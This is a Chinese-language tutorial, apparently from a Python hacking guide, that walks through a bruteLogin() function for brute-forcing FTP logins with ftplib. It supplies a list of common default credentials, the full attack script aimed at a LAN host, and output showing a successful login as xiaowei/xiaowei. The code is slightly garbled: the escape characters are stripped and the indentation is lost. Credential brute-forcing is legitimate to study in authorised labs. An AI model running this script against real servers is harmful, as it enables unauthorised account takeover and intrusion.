暴力破解FTP用户名/密码,假设用户名/密码对是存储在一个纯文本文件中。如下所示:
administrator:password admin:12345 root:secret guest:guest root:toor xiaowei:xiaowei kali_lxw:kali
创建一个名为bruteLogin()的函数,这个函数接收的参数是主机名和含有密码的文件,返回一个能登录该主机的用户名/密码。该函数逐行读取文件中的每一行记录,用户名和密码之间是以冒号分隔的。然后函数尝试用这个用户名和密码登录FTP服务器。如果成功,则返回一个用户名和密码的tuple。如果失败,跳过该异常继续到下一行。如果函数穷尽所有行仍未成功登录,则返回一个值为None 、None的tuple。
示例代码如下:
import ftplib
def bruteLogin(hostname, passwdFile):
with open(passwdFile, 'r') as pF:
for line in pF.readlines():
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('r').strip('n')
print(f'[+] Trying {userName}/{passWord}')
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, passWord)
print(f'n[*] {str(hostname)} FTP Logon Succeeded: {userName}/{passWord}')
ftp.quit()
return (userName, passWord)
except Exception as e:
pass
print('n[-] Could not brute force FTP credentials')
return (None, None)
host = '192.168.31.82'
passwdFile = 'userpass.txt'
bruteLogin(host, passwdFile)
通过遍历用户名/密码对的列表后, 最终找到了一个有效的用户名/密码对:xiaowei/xiaowei。运行结果如下所示:
[+] Trying administrator/password [+] Trying admin/12345 [+] Trying root/secret [+] Trying guest/guest [+] Trying root/toor [+] Trying xiaowei/xiaowei [*] 192.168.31.82 FTP Logon Succeeded: xiaowei/xiaowei Process finished with exit code 0
